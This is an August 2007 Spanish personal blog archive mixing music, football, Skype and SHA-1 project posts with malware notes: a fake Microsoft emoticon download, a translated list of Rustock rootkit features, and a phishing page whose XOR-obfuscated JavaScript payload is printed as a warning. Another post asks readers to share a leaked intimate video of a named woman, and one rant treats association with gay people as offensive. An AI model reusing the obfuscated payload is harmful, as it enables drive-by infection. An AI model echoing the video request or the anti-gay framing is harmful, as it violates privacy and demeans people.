Archivos Agosto 2007

31

Ago

Blog Day


Pues si, hoy es el blog day, y se supone que deberia de poner una entrada con links a 5 blogs que no conosca epro la neta no ke hueva me dá.

Saludos.

31

Ago

Foo Fighters - The Pretender (Official Video)

Foo Fighters - The Pretender (Official Video)

31

Ago

Microsoft distribuye software empaquetado con PECompact

Hoy recibí un correo de parte de Microsoft, el cual dice lo siguiente:

Emoticons gratis para tu Messenger
De: Tus amigos de Prodigy/MSN (communications_msn_cs_esmx@cimail15.msn.com)
Enviado:
viernes, 31 de agosto de 2007 05:23:24 a.m.
Para:
xxxxxxxxxxx@hotmail.com



Está recibiendo este correo de Windows Live porque para nosotros usted es un miembro valioso. Microsoft respeta su privacidad. Para más información lea por favor nuestro sitio de Privacidad.
Esperamos que haya encontrado esta comunicación valiosa, sin embargo, si usted prefiere no volver a recibir correos con ofertas y promociones de Windows Live favor de visitar nuestro sitio de Preferencias de Marketing.


..
Message-Id: <20070830222322.2ED0.10374572-4550@cimail15.msn.com>



Normalmente este tipo de correos los borro, pero algo me resulto extraño en el, asi que decidí seguir el link y descargar los emoticones grátis. Una vez que descargue el archivo llamado autosearch.exe (vaya nombre, a gritos dice yo soy malware), lo examine en virus total, obteniendo este resultado:



Análisis del archivo autosearch.exe recibido el 31.08.2007 17:22:17 (CET)
Estado actual: análisis terminado
Resultado: 7/32 (21.88%)

Motor antivirus Versión Última actualización Resultado
AhnLab-V32007.9.1.02007.08.31-
AntiVir7.4.1.662007.08.31HEUR/Crypted
Authentium4.93.82007.08.31Possibly a new variant of W32/Threat-SysVenFakP-based!Maximus
Avast4.7.1029.02007.08.30-
AVG7.5.0.4842007.08.31-
BitDefender7.22007.08.31-
CAT-QuickHeal9.002007.08.31(Suspicious) - DNAScan
ClamAV0.91.22007.08.31-
DrWeb4.332007.08.31-
eSafe7.0.15.02007.08.29Suspicious Trojan/Worm
eTrust-Vet31.1.50992007.08.31-
Ewido4.02007.08.31-
FileAdvisor12007.08.31-
Fortinet3.11.0.02007.08.31-
F-Prot4.3.2.482007.08.31W32/Threat-SysVenFakP-based!Maximus
F-Secure6.70.13030.02007.08.31-
IkarusT3.1.1.122007.08.31-
Kaspersky4.0.2.242007.08.31-
McAfee51092007.08.30-
Microsoft1.28032007.08.31-
NOD32v224932007.08.31-
Norman5.80.022007.08.31-
Panda9.0.0.42007.08.31-
Prevx1V22007.08.31-
Rising19.38.42.002007.08.31-
Sophos4.21.02007.08.31-
Sunbelt2.2.907.02007.08.25VIPRE.Suspicious
Symantec102007.08.31-
TheHacker6.1.9.1752007.08.31-
VBA323.12.2.32007.08.30-
VirusBuster4.3.26:92007.08.30-
Webwasher-Gateway6.0.12007.08.31Heuristic.Crypted
Información adicional
Tamaño archivo: 222208 bytes
MD5: bf2df0509612e901f906f5f477de7f31
SHA1: 91d1c5e1f05fd7c58b9f905f52b630e4b92a80bf
packers: PECOMPACT
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.


Como podemos observar el archivo esta empaquetado con PECompact, porque  bueno eso si es un misterio, pero si no mal me equivoco es para que no puedas extraer los emoticons del executable.

Es raro ver que microsoft haga algo como esto y hasta cierto punto muchos sabemos que es algo que no se debe de hacer.

Saludos

30

Ago

Un Millon de creditos...

El equipo de Kriptópolis por fin llega al millon de creditos en el Collision Search Graz,l en donde yo he contibuido con  3,570.00 creditos en este momento y el Robe tiene 4,100.00 creditos.

Espermo seguir así  y que el equipo de kriptópolis sea el que encuetre la coliosión tan buscada.

Saludos

30

Ago

¿cómo se puede engañar medidor C.F.E.?

Ya se imaginarán mi sorpresa a ver que alguine llego al blog buscando "engañar medidor C.F.E". No es que sea el hecho de que eso sea un delito ( que sin embargo lo es), pero si yo supiera la forma de engañar al medidor y no ser descubierto ni loco lo publico, por dos razones. La primera y más escencial de todas es que es delito federal alterar/ engañar o hacer cualqueier cosa a la instalación eléctrica, con el fín de pagar menos de luz. Y la segunda es que entre más personas conoscan un secreto este deja de serlo, es decir si yo se como burlar el medidor y comienzo a divulgarlo, la CFE tomará nota y sabrá que buscar, por lo tanto si tu sabes como se hace algo y te estas veneficiando de ello, el mejor consejo es no revelar como lo estas haciendo o que estas haciendo.

Saludos.

30

Ago

Los Tuzos del Pachuca campeones de la super liga

Ayer por la noche se realizo el encuentro que definiria al campión de la super liga, en la que participarón 4 equipos mexicanos y 4 equipos gringos. Este encuentro se jugo en la casa del LA Galaxy.

El primer tiempo fue para los tuzos del pachuca que a pesar de dominar de una manera apabullante, no lograron dejar muestra de esto en el marcador, puesto que al finalizar el primer tiempo el pachuca apenas logro anotrar un gol, lo cual no le sirvio de mucho, ya que al segundo tiempo el equipo del galaxy se dejo ir con todo, al frente para atacar y atacar al pachuca. Hay decir que este partido fue un partido de porteros, donde ambos cancerveros tubieron mucho que ver para que en el encuentro no hubiera una cantidad de goles mas grande. En el segundo tiempo Calero tapo todo lo  que el Galaxy le tiro, pero desafortunadamente en el ultimo minuto del tiempo de reposcición un jugador del Galaxy saco una genialidad  y logro anotar el gol de la igualada en el marcador. Este gol forzo tiempos extras, los cuales transcurieron sin mucho cambio a lo que habian sido los 2 tiempos anteriores, llegadas de ambos lados del campo.

Una vez que se llego a la tan temida tanda de penales, el Sr Miguel Calero saco la casta por el equipo de Pachuca y detuvo dos penales, incluyendo el que tiro Dandon Donovan. Al final y ya en muerte subita, el portugues que traia el Galaxy , que le encanta el peroxido, fallo el penal que le dio el triumfo al Pachuca.

Felicidades a los campeones de la Super Liga.

Jajaja cabe mencionar que los gringos tenian sus pancartas y mantas que decian "This is our Liga" o "Esta es nuetra  Liga" en español, y aunque todos los partidos fueron en la casa de los equipos americanos, los paisanos que viven en EU le demostraron a los gringos que aun en su casa seguimos siendo locales.

Saludos

30

Ago

Servicio Técnico de 1200 DC

Con tan solo ver este video me hace recordar muchas cosas con las que tengo que liderar muy seguido, pero aunque pareciera extraño, es divertido ver ala gente preguntar y preguntar lo mismo y tu decirle con cara de "estas pendejo o te haces", claro señor se hace así.

Saludos.

30

Ago

Toyano Rustock / pe386

Este texto fue publicado por EP_X00F en los foros de sysinternals.

aqui

-- comienza traducción --

Hola

El troyano Rustock, acutalmente es uno de los malwares más avanzados tecnicamente. La uni ca parte que conforma esta troyano, se encuentra implementada en el modo kernel, así como su sistema de antidetección y su sistema de red.

Esta es una lista de las versiones disponibles de Rustocy y algunas de sus variantes (posiblemente no todas).


La mayoria de ellas fueron encontradas con la ayuda de herramientas HIDS gratuitas o con la ayuda de HIPS.


i386.sys
sysbus32.sys (2006)

wincom32.sys (2006?)

SSDT patching y IRP hooking

??windev.sys (2006?)

No hay información

pe386.sys (2006)


Hooking de la SYSCALL / ocultacion del driver.

mni41.sys (2006)*

*El driver puede tener un nombre aleatorio.

SSDT inline hooking, IRP hooking
Empaquetado con un protector polimórfico similar al de las versiones posteriores
Motor TCP/IP stack (firewalls sobrepasadas)
Eliminación de los competidores (ntio256.sys y runtime2.sys)

Como puede observarse, esta versión fue detectada apenas unos cuantos meses atras.


huy32.sys (2006)

Beta de Rustock.B
Contiene casi toda la funcionalidad de la versión principal

lzx32.sys (2006)

Actualmente es el rootkit de modo kernel mas avanzado que se a detectado
SYSCALL inline hooking
Utiliza ADS para ocultarse (diferentes variantes utilizan diferentes maneras para hacer esto)
motor TCP/IP stack  (firewalls sobrepasadas)
Sistema avanzado de antidetección (Contiene una lista negra de antirootkits - RKR, IceSword, DarkSpy, Blacklight, GMER)
Tanto el Dropper y el driver estan empaquetados con un protector avanzado.


Rustock.C (2006)
??Rustock.D (2007?)

Implementación en la parte profunda del kernel
Firewall y antivirus completamente sobrepasados
Autodefensa (DKOM y parcialmente DKOH)
Sistema Anti antirrotkits (los antirootkitys mas populares son sobrepasados)
Sistema Anti VM (las maquinas virtuales "VM" son detectadas y se evita la ejecución en estas)
Técnicas anti debugging
Empaquetador Polimórfico para drivers y droppers (unico, empaquetador + protector para drivers privado)

Para nosotros carece de todo sentido el proposito ("aspetos éticos" y otras mierdas ) con el que se haya desarrollado esta serie de troyanos y lo que este haciendo en la actualidad. Nosotros estamos interesados solamente en la propia tecnología de los rootkits, debido a que esta puede mejorar las habilidades de todos los antirootkits dessarrollados en estos momentos (RkU, gmer, IceSword).

Así que si alguine puede agragar algo más acerca de Rustock o alguno acerca de sus multiples variantes, estaremos muy felices de ello.

-- Termina traducción --

Saludos

29

Ago

Otra razon mas para no querer a Windows Vista

Pues resulta que me acabo de enterar de que DirectX 10 solo esta disponible para Windows Vista, lo cual me parece una forma en la que Microsoft trata de prcionar para que los usuarios migren  a Win Vista.

Pero ahora veamos la otra cara de la moneda, los creadores de video juegos, siendo honestos que es lo que mas le interesa aun vendedor de juegos, si le aatinaron el vender la mayor cantidad de copias originales de su juego. Ahora imaginemos que del 100% de usuarios que usan Windows el 20% utiliza Windows Vista y el 60% utiliza Windows XP, creo que por simple logica podemos ver a que mercado dirigiremos nuestro producto, el más grande.

Tal vez cuando windows Vista sea el que domine el mercado Microsoft podría idear alguna estrategia como está, pero en estos momentos está táctica, no hace otra cosa más que atentar contra los jugadores que no han decidido migrar a Vista y que muy posiblemente no piensen hacerlo.

He ahi mi opinión con respecto a esto.

Saludos.

29

Ago

Software para desbloquear el IPhone

Una compañia ha dejado ver que puede desbloquear los IPhones. Aun no han revelado el costo que esto tendra, pero si el hecho de que tendras licensias, por lo que cada licencia comprada sera un Iphone desbloquedo.

No hace mucho se habian liberado unas instrucciones para desbloquear los iphones de manera manual y con varios chips, el más grande inconveniente con este metodo era el tener que abrir tu iphone nuevo y meterle mano, lo que para muchas personas podria resultar fatal, ya que la mayoria de la gente no solemos soldar o instalar artilugios electronicos.
Hay rumores de que en México la compañia que traera el iphone sera Telcel, lo cual no es de extrañar si tomamos en cuenta que es propiedad del hombre más rico del mundo, el sr Carlos Slim.

Ya solo para terminar les dejo el enlace de esta página en la que podran comprar el software para desbloquear su futuro IPhone.

http://iphonesimfree.com/

Saludos.

28

Ago

El poder de un nombre... Wanda Nara

El día de ayer el blog tuvo alrededor de 1600 hosts, que a decir verdad es el número más grande que se ha registrado en la historia de este sitio. Mucha de la culpa de que las visitas bajaran en las últimas semanas la tiene el hecho de que se cambió de dominio, con todo y que implemente un código en php para redirigir a  los usuarios desde mixel.aztekaconsultores/blog  a mixelandia.com, por lo tanto si alguien visitaba una página era redirigido a su semejante en  mixelandia. No obstante Google se ha puesto sus moños y por ejemplo el dominio de mixelandia.com aun no tiene Page Rank, más este no ha sido una limitante para que sigamos con las pilas bien puestas y para muestra lo acontecido el dia de ayer.

En otro ámbito, me gustaría que vieran un poco de las estadisticas de como es que la gente llega a mixelandia desde los motores de busqueda (google, yahoo, altavista, etc).
NúmeroOcurrenciasTexto
#11202ba-k.com
#2609metroflog
#3283video prohibido de wanda nara
#4261mascota virtual
#5179ba-k
#6139enviar mensajes gratis
#7106mensajes gratis a celular
#872imagenes para metroflog
#969chica cbtis
#1063mixelandia

Hay algunas cosas para notar, como por ejemplo que ba-k.com sea la palabra por la que más personas llegan al blog y que alguna gente busque Mixelandia, tal vez no recuerdan la dierección.

Ya para no andar con chingaderas solo quedad decir que muchas de las 1600 visitas de ayer, tuvieron que ver con la entrada del video prohibido de wanda nara, que aunque no lo he visto, el ruido que se esta haciendo a su alrededor me hace suponer que es más morbo que otra cosa.

Saludos

27

Ago

La Mixelandia pirata

Checando el poscicionamiento de Mixelandia en google, me tope con que existe una versión pirata de Mixelandia.

Tengo que dejar en claro que no soy homofobico ni estoy en contra de los Gays (inclusibe he conbocido parejas gay y han sido amigos mios), pero no estoy de acuerdo con que el nombre de Mixelandia, se asocie con Gays, puesto que todos los que aquí participamos tenemos lineamientos heterosexuales.

Ya en algunas ocaciones he expresado lo que pienso y creo de los metros y fotologs, que desde mi punto de vista no aportan nada o que muchas veces solo distorcionan el español con su forma de escribir tan absurda. Ya podran imaginar la sorpresa que me lleve al ver esta aberración/perversión en la que urtaron la palabra de Mixelandia, y lo peor del caso es que nisiquiera se trata de una vieja buena o ya de perdis de algun grupo musical, sino de una persona que exibe fotos GAY. Como creador de Mixelandia, esto me parece algo ofensivo y aberrante que mixelandia se relacione con la homosexualidad, más aun por el hecho de que Mixelandia nace de Mixel, que es el nick que utilizo en el MSN Messenger, así como en internet, por lo tanto no se de que manera pero les pido que nos apoyen para terminar con este robo de identidad, ya que algo tan estupido como esa "Seudo-página" no deberia de estar listada en google bajo el termino de Mixelandia.

Cada quien es libre de colocar en su página lo que quiera o tenga permitido según los reglamentos de el prestador de servicio (hoting), pero tengo que dejar en claro que el hecho de que se utilice mixelandia de esa manera no es precisamente lo que tenia en mente al crearlo y que no me agrada.


Les dejo el link para que vean la estupides de este "Fotolog".

la direccion es la siguiente: http://www.fotolog.com/mixelandia


PD: No es un link directo pues to que no quiero ayudar a el posicionamiento de ese lugar tan ojete llamado Copia aberrante y pirata de Mixelandia.

27

Ago

Si me dieras a escoger entre tus boxers o tus tangas yo me quedo con tus nalgas

El día sabado 25 de Agosto estubo en la ciudad de Durango el cantautor Armando Palomas el cual es reconocido como uno de los roleros más polémicos de los últimos tiempos, solo por no decir que el más polémico.

Esta frase que le da el nombre a la entrada fue una de las mejores puntadas de la noche del señor palomas, así como otras tantas que causaron una gran impresión entre los asistentes, que corearon y cantaron todas las canciones que engalanaron la noche, que sin lugar a dudas sera recordada como una presentación que dejo un muy bone sabor de boca (y no presisamente por la cheve que consumimos).

Saludos desde Durrancho

23

Ago

El video prohibido de Wanda Nara

Alguien tiene este video para que lo pase??? porque tumbaron el agregador de UBH buscando este video


Si alguien lo tiene rolelo please.

22

Ago

Skype aclara la conexión de Microsoft con el fallo del 16 de agosto

Ayer publicamos una explicación de lo que paso con Skype el 16 de agosto, sin embargo algunas de las reacciones que esta causo no hicieron recordar una de la recglas basicas de la comunicacion: No es lo que tu dices, sino lo que ellos escuchan. A esto nos gustaria aclarar el pequeño malentendido que surgio en las reacciones a nuestra explicación de lo ocurrido la semana pasada.


1. ¿Estamos culpando a Microsoft de lo ocurrido?

No culpamos a nadie mas, que anosotros por lo ocurrido. Los parches de actualización de Microsoft, fueron solamente el catalizador para una serie de eventos que condujeron a la interrupción del servicio de Skype, no la causa principal de esto. Por el contrario Microsoft se ha mostrado en la mejor dispocicion para ayudarnos a resolver este inconveniente.


El gran número de reinicios después de la actualización afectaron los recursos de la red de Skype. Esto causo que existiera un desvordamiento en el número de peticiones de log-in, aunado a la falta de recursos de la red peer-to-peer en ese momento, comenzó una reacción en  cadena que tuvo un impacto crítico en el servício de Skype. El mecanismo de autorecuperación del la red P2P con el que cuenta el software de Skype había trabajado bien en el pasado, y como prueba de esto es el hecho de que cada vez que Skype se había tenido que recuperar de los reinicios de acompañan a las rutinas de actualización de Windows, lo habia hecho sin ningún problema.

Desafortunadamente, esta vez, y por primera ocación, Skype no fue capaz de salir avante ante tal reto y la razones fueron realmente excepionales. En este caso la fran carga de trafico en la red de Skype, combinada con el gran número de reinicios, revelaron un error no visto anteriormente en el algoritmo de asignación de recursos de red. Consucuentemente la fucnción de autorecuperación de la red P2P no pudo resolvel el problema lo suficientemente rápido. La parte pricipal peer-to-peer de Skype no estaba ajustada para soportar la carga y los cambios ocurridos el 16 de Agosto.  Los reinícios resultantes de los parches de software, solamente sirvieron como un catalizador. Esta combinación de factores crearon una dituaciçon en la que la autorecuperación necesitó ayuda externa de nuestros ingenieros.

2. ¿Qué cambio hubo en esta actualización?

En pocas palabras, no cambio nada en esta actualización. Durante una llamada telefónica realizada inmediatamente despues de que los problemas fueron detectados, los ingenieros de Skype y Microsoft estubieron  revisando la lista de parches que habian sido instalados. Fuimos descartando uno a uno cada parche  como posible causa del problema de Skype. También dimos un repaso al proceso de actualización de Windows, para ver si algo había cambiado en el, solo para comprobar que nada había cambiado. El equipo de Microsoft hizo un trabajo fantástico, y despues de haber repasado todas las posibles causas, nos resulto aun más claro que nunca que nuestro algoritmo de manejo de recursos de la red P2P, noe staba afinado de una manera adecuada para tomar en cuenta la combinación de mucha carga y el reinicio de los supernodos.


3 ¿Cómo es que las actualizaciones anteriores de microsoft no causaron una interrupción?

Esto se debe a que las actualizaciones no fueron la causa de la interrupción del sevicio. En ocaciones anteriores cuando un numero muy grande de supernodos de la red P2P reiniciaron, los demas factores de la "Tormenta perfecta" no estubieron presentes. Así pues no hubo la combinación de una alta carga mientras los supernodos se reiniciaban. Como resultado los recursos de la red fueron asignados de una manera eficiente y la autorecupertación trabajo de una forma adecuada tal que pudo salir abante ante tal reto.


4. Has the bug been fixed? Should Skype users worry about future Microsoft Update patches and reboots?

¿Se ha corregido el Error o deberían de preocuparse los usuarios de Skype pro futuros parches de Microsoft y más reinicios?
Si el error ha sido eliminado. Los parametros de la red P2P han sido afinado para manejar de una manera más eficiente este ripo de situaciones. Una vez que encontramos la solucion para asegurar la continuidad del servicio. Esto significa que Skype puede lidiar con situaciones iguales a las que se presentaron el 16 de Agosto. Queremos reafirmar a nuestros usuarios que estamos hecho lo necesario para asegurar que esto no vuelva a pasar de nuevo. Hemos introducido un gran numero de mejoras a nuestro software para en  el indeseable  caso de que esta combinación de eventos vuelva a ocurrir.



21

Ago

Colabora con Kriptópolis buscando colisiones en SHA-1

Ayudemos todos a Kriptopolis a Ganar en este reto :)

Esta entrada esta completamente copiada de Kriptopolis.org

Estadisticas

Actualización (21-Ago, 19:15): Con 351 inscritos y 266 participantes activos, seguimos en el puesto 1 del ránking mundial de mejores equipos y nuestro cŕedito total supera ya los 325.000 puntos. Sin duda todo un éxito, pero que no se sostiene solo. Cualquier ayuda -por pequeña que sea- sigue siendo necesaria para poder mantener este alucinante ritmo, ¡que los alemanes aprietan!. Por último, y en atención a los numerosos miembros de otras nacionalidades, nuestro equipo pasa a ser "International".

Kriptópolis os invita a formar parte del equipo de este sitio que participa en este proyecto de computación distribuida.

El proyecto ha sido puesto en marcha por la Universidad de Graz (Austria) y se dirige a encontrar colisiones en SHA-1 mediante la colaboración de aquellos usuarios que deseen dedicar los tiempos muertos de proceso de sus ordenadores a la búsqueda.

Los lectores de Kriptópolis que deseen formar parte de nuestro flamante equipo han de descargar e instalar en sus sistemas el software libre de computación distribuida BOINC, de la Universidad de California en Berkeley.

Actualización (18-Ago, 17:33): Con 225 participantes activos, nuestro equipo suma más miembros que los veinte equipos que nos siguen en la clasificación juntos, aunque no conviene perder de vista el empuje en los últimos días del equipo alemán Planet 3DNow! que nos sigue en la tabla. Seguimos en el puesto 1 del ránking mundial de mejores equipos y nuestro cŕedito total supera los 176.000 puntos!!

Actualización (17-Ago, 11:00): Con 196 participantes activos, nuestro equipo suma más miembros que los veinte equipos que nos siguen en la clasificación juntos, aunque no conviene perder de vista el empuje en los últimos días del equipo alemán Planet 3DNow! que nos sigue en la tabla. Seguimos en el puesto 1 del ránking mundial de mejores equipos y nuestro cŕedito total supera los 120.000 puntos!!

Actualización (16-Ago, 20:30): Contamos ya con 175 miembros que han obtenido resultados. Seguimos en el puesto 1 del ránking mundial de mejores equipos, pero cada vez más destacados. Nuestro cŕedito total, supera los 100.000 puntos!!

Actualización (15-Ago, 9:30): Contamos ya con 103 miembros que han obtenido resultados. Su esfuerzo y generosidad nos colocan en el puesto 1 del ránking mundial de mejores equipos. Enhorabuena a todos!! Sois lo mejor!! Hasta en Austria os lo reconocen... ;)

Actualización (14-Ago, 18:25): Contamos ya con 157 miembros, 89 de los cuales han obtenido resultados. Eso nos coloca en el puesto 4 del ránking mundial de mejores equipos.

Actualización (14-Ago, 9:30): Contamos ya con 124 miembros, 75 de los cuales han obtenido resultados. Eso nos coloca en el puesto 5 del ránking mundial de mejores equipos.

Actualización (13-Ago, 16:50): Contamos ya con 91 miembros, 40 de los cuales han obtenido resultados. Eso nos coloca en el puesto 6 del ránking mundial de mejores equipos.

Actualización (13-Ago, 10:35): Contamos ya con 64 miembros, 28 de los cuales han obtenido resultados. Eso nos coloca en el puesto 9 del ránking mundial de mejores equipos. Y todo en menos de 48 horas. A este paso acabamos con SHA-1... y con todo lo que nos pongan por delante!! Gracias de nuevo!

Actualización (12-Ago, 23:20): En estos momentos nuestro equipo cuenta con 50 miembros, de los que 18 ya han obtenido resultados. Muchas gracias a todos. Contamos con el grupo más numeroso de todo el proyecto. ¡Ahora a poner las CPUs a trabajar! Fuerza, Kriptópolis!!

Actualización (12-Ago, 13:40): El equipo Kriptópolis ya ocupa el puesto 21 del ránking, justo por detrás del equipo del MIT ;-).

Actualización (12-Ago, 11:15): Añadidas instrucciones para instalar y configurar el programa cliente bajo Linux.

CLIENTES LINUX. INSTALACIÓN Y PUESTA EN MARCHA.

NOTA: los usuarios de Linux pueden comprobar antes si existe binario de BOINC específico para su distribución.

Si descargaste el fichero estándar de boinc, antes de nada has de dotar al script de instalación de permisos de ejecución:

# chmod +x boinc_5.8.16_i686-pc-linux-gnu.sh

A continuación, lo ejecutamos:

# ./boinc_5.8.16_i686-pc-linux-gnu.sh

Tendrás ahora un directorio BOINC. Si entras en él y haces doble clic sobre el fichero boincmgr arrancará el programa (en el mismo directorio dispones de iconos para crear un enlace en tu escritorio a este ejecutable):

 

Iniciando...

 

Comenzaremos eligiendo el proyecto SHA-1 de la Universidad de Graz:

 

Escogiendo proyecto...

 

En la casilla para la URL de proyecto, escribe:

http://boinc.iaik.tugraz.at/sha1_coll_search/

 

Elegimos proyecto...

 

Escribe una dirección de correo y elige una contraseña:

 

Inscripción como miembro...

 

Por alguna razón que desconozco este método (el más sencillo y recomendado) no funcionó en mi caso, por lo que tuve que inscribirme primero mediante la página web del proyecto y luego introducir esos datos en las casillas mostradas arriba.

No olvides hacer login en tu cuenta y unirte al equipo de kriptopolis. Cuanto más seamos más ayudaremos y más posibilidades tendremos de hallar el gazapo ;)

En cualquier caso, el programa arranca, se descarga los primeros datos para trabajar y empieza a buscar colisiones:

 

Funcionando...

 

Sólo resta configurarlo pulsando sobre el botón "Preferences". Ahí podrás indicar cómo y cuándo quieres que funcione:

 

Configurando...

Esperemos que el Equipo Kriptopolis sea el ganador...

21

Ago

Cuidado con este correo (contodo y fishing incluido)

el dia de hoy recivi un correo electronico de "Ringtone Heaven" el cual el mismo hotmail lo detecto como peligros, sin embargo me gano la curiosidad y ver que contenia el correo.

Una vez que lo habri este era su contenido..

Dear Member,

We are glad you joined Ringtone Heaven.

Account Number: 4647573518
Temp Login ID: user5724
Temorary Password: dn822

Please Change your login and change your Login Information.

Follow this link, or paste it in your browser: http://71.9.135.153/

Welcome,
Membership Services
Ringtone Heaven


El problema comienza por el simple hecho de que yo no tengo una cuenta en ringtone heaven...
y ahor aque hay en la dirección ip ala que hace referecia este mail, pues una inofensiva pagina en la que te dicen que descargues un inofensivo applet.exe el que por cierto tiene cero bytes es decir es un archivo vacio.


If you do not see the Secure Login Window please install our Secure Login Applet.

Esto es lo unico que menciona la pagina en cuestion, sin embargo no todo es lo que parece puesto que el código en html de la pagina es el siguiente.

<head></head>
<body>If you do not see the Secure Login Window please install our <a href="/applet.exe">Secure Login Applet</a>.

<script language="JavaScript">
 function xor_str(plain_str, xor_key){
var xored_str = "";   
for (var i = 0 ; i < plain_str.length; ++i) xored_str += String.fromCharCode(xor_key ^ plain_str.charCodeAt(i));
return xored_str;
 }
 var plain_str = "\xf2\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf
\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf
\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf
\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf
\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf
\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xdf\xd8\xee\x9a\x86\x9f\x9e\xec\xee\x9a\x97\x93
\x96\xec\xee\x81\x91\x80\x9b\x82\x86\xec\xa4\xb3\xa0\xf2\xa1\xef\xa7\xbc\xb7\xa1\xb1\xb3\xa2\xb7\xfa\xf0
\xf7\xa7\xe6\xe3\xe6\xe3\xf7\xa7\xe6\xe3\xe6\xe3\xf7\xa7\xe6\xe3\xe6\xe3\xf7\xa7\xe6\xe3\xe6\xe3\xf7\xa7
\xe6\xe3\xe6\xe3\xf7\xa7\xe6\xe3\xe6\xe3\xf7\xa7\xe6\xe3\xe6\xe3\xf7\xa7\xe6\xe3\xe6\xe3\xf0\xfb\xe9\xb6
\xbd\xa9\xa1\xf9\xef\xa1\xe9\xaf\xa5\xba\xbb\xbe\xb7\xfa\xa1\xfc\xbe\xb7\xbc\xb5\xa6\xba\xee\xe2\xaa\xe2
\xeb\xe2\xe2\xe2\xe2\xe2\xfb\xe9\xa1\xf9\xef\xa7\xbc\xb7\xa1\xb1\xb3\xa2\xb7\xfa\xf0\xf7\xa7\xe7\xe6\x97\x90
\xf7\xa7\xe5\xe7\xea\x90\xf7\xa7\xea\x90\xe1\x91\xf7\xa7\xe1\xe7\xe5\xe6\xf7\xa7\xe2\xe1\xe5\xea\xf7\xa7\xe7
\xe4\x94\xe7\xf7\xa7\xe5\xe4\xea\x90\xf7\xa7\xe2\xe1\xe0\xe2\xf7\xa7\xe1\xe1\x94\xe7\xf7\xa7\xe6\xeb\x91\xeb
\xf7\xa7\x93\x96\xe6\xe3\xf7\xa7\x96\x90\xe1\xe1\xf7\xa7\xe2\x94\xe1\xe4\xf7\xa7\xe3\xe6\x90\x97\xf7\xa7\xe1
\xea\xe0\xea\xf7\xa7\xe5\xe6\x94\xe0\xf7\xa7\x91\xe3\xe2\xea\xf7\xa7\xe2\x96\x91\x90\xf7\xa7\x96\x93\xe2\xe1
\xf7\xa7\x97\x90\xe6\xe2\xf7\xa7\xe1\x90\x97\x94\xf7\xa7\xe5\xe7\x96\x94\xf7\xa7\xe7\x97\x97\xe5\xf7\xa7\xe7
\x97\xea\x90\xf7\xa7\xe2\xe1\xe0\xe6\xf7\xa7\xe4\xe4\x96\x96\xf7\xa7\xe2\x91\xea\x90\xf7\xa7\xea\x90\xe6\x90
\xf7\xa7\xe3\x91\xe7\x97\xf7\xa7\x96\x96\xe2\xe1\xf7\xa7\xe2\xe6\xea\x90\xf7\xa7\xe2\xe1\xea\x90\xf7\xa7\x91
\xe1\x91\xe7\xf7\xa7\xe5\xe0\xe5\xe7\xf7\xa7\xe4\x96\xe4\x91\xf7\xa7\xe4\x97\xe4\x94\xf7\xa7\xe4\xe6\xe0\x97
\xf7\xa7\xe4\x91\xe4\x91\xf7\xa7\xe6\xe1\xe2\xe2\xf7\xa7\xe7\x91\xe1\x93\xf7\xa7\xe0\x97\xe7\xe7\xf7\xa7\xe5
\xea\xe4\xe7\xf7\xa7\xe2\xe2\xe4\xe7\xf7\xa7\x91\xe2\xe1\xe1\xf7\xa7\xe2\xe1\xe4\xe6\xf7\xa7\xe1\xe2\xe6\xe2
\xf7\xa7\xe2\x91\xe5\xea\xf7\xa7\xe6\xe2\xea\x90\xf7\xa7\xea\x90\xe2\x91\xf7\xa7\xe3\x91\xe5\xe2\xf7\xa7\xea
\x90\x93\x96\xf7\xa7\xe2\xea\xe6\xe2\xf7\xa7\xe2\xeb\x97\x90\xf7\xa7\xe6\xe2\xea\x90\xf7\xa7\xea\x96\xe1\xe6
\xf7\xa7\xe5\x91\xe6\xe2\xf7\xa7\xe6\xe2\xea\x90\xf7\xa7\xeb\xe7\xe1\x91\xf7\xa7\xea\x97\x90\x94\xf7\xa7\xe2
\x97\xe6\x97\xf7\xa7\x97\xea\x97\x91\xf7\xa7\x94\x94\xea\xe6\xf7\xa7\x94\x94\x94\x94\xf7\xa7\x97\x91\xea\xe1
\xf7\xa7\xea\xe1\xe2\xe6\xf7\xa7\xe0\xe6\xe0\x91\xf7\xa7\x94\x94\xe1\x91\xf7\xa7\xeb\xe7\x96\xe2\xf7\xa7\x90
\x94\xe7\xe2\xf7\xa7\xe3\x93\xe1\xe4\xf7\xa7\xe5\xe2\xe0\x94\xf7\xa7\xe4\x94\x97\xea\xf7\xa7\x94\x94\x94\x94
\xf7\xa7\xea\x90\x94\x94\xf7\xa7\xe0\xe6\xe7\xe6\xf7\xa7\xea\x96\x94\x91\xf7\xa7\x90\x93\xe7\xe0\xf7\xa7\x96
\x90\xe1\xe1\xf7\xa7\xe7\xe1\xe7\xe1\xf7\xa7\x97\x90\xe7\xe0\xf7\xa7\xe7\xe1\xe0\xe6\xf7\xa7\x96\xe2\x94\x94
\xf7\xa7\x90\x94\xe7\x96\xf7\xa7\x94\x97\xeb\xea\xf7\xa7\xe2\x97\xea\x93\xf7\xa7\xe7\xe1\x97\xea\xf7\xa7\x94
\x94\x94\x94\xf7\xa7\xea\xe1\x94\x94\xf7\xa7\xe2\xe6\x97\x91\xf7\xa7\xe0\x91\xea\xe1\xf7\xa7\xe4\xe0\xe0\xe6
